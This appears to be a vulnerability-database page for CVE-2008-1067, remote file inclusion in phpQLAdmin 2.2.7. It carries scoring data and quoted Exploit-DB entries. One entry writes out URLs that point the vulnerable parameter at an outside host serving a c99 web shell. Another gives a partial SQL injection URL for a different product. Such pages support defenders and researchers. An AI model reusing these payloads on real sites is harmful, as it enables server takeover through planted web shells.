CVE-2008-1067
published 2008-02-28CVE-2008-1067: Multiple PHP remote file inclusion vulnerabilities in phpQLAdmin 2.2.7 allow remote attackers to execute arbitrary PHP code via a URL in the _SESSION[path]…
PriorityP348medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
19.84%
97.1th percentile
Multiple PHP remote file inclusion vulnerabilities in phpQLAdmin 2.2.7 allow remote attackers to execute arbitrary PHP code via a URL in the _SESSION[path] parameter to (1) ezmlm.php and (2) tools/update_translations.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| phpqladmin | phpqladmin | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Social Groupie - 'id' SQL Injection
exploitdb·2008-12-12
CVE-2008-6358 Social Groupie - 'id' SQL Injection
Social Groupie - 'id' SQL Injection
---
|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
| _ __ __ __ ______ |
| /' \ __ /'__`\ /\ \__ /'__`\ /\ ___\ |
| /\_, \ ___ /\_\/\_\L\ \ ___\ \ ,_\/\ \/\ \ _ __\ \ \__/ |
| \/_/\ \ /' _ `\ \/\ \/_/_\_> Kings of injection |
| \/___/ |
| |
|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
> Found by : Cyb3r-1sT
> C0ntact : cyb3r-1st [at] hotmail.com
> Groups : InjEctOr5 T3am
+++++++++++++++++++ Script information+++++++++++++++++
> script : Social Groupie
> download : www.socialgroupie.com
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
> D0rk : find it
> Exploit :>>>
:>> http://www.site.me/group_index.php?id=-1067+Union
Exploit-DB
phpQLAdmin 2.2.7 - Multiple Remote File Inclusions
exploitdb·2008-02-22
CVE-2008-1067 phpQLAdmin 2.2.7 - Multiple Remote File Inclusions
phpQLAdmin 2.2.7 - Multiple Remote File Inclusions
---
# Name : phpQLAdmin 2.2.7 Multiple Remote File Include
# Download From : http://phpqladmin.com/phpQLAdmin-2.2.7.zip
# Found By : RoMaNcYxHaCkEr [RoMaNTiC-TeaM]
# Home Page : WwW.4RxH.CoM
+============================================================================+
# Vulne Code In Files ezmlm.php & update_translations.php
# Exploit :
http://www.4rxh.com/phpQLAdmin-2.2.7/ezmlm.php?_SESSION[path]=http://rxh.freehostia.com/shells/c99in.txt?
http://www.4rxh.com/tools/update_translations.php?_SESSION[path]=http://rxh.freehostia.com/shells/c99in.txt?
That,s It,s
Good Luck Everybody
+============================================================================+
# Greet To :
Tryag TeaM & All Members Of My Forum
# For Contact : [email protected]
2008-02-28
Published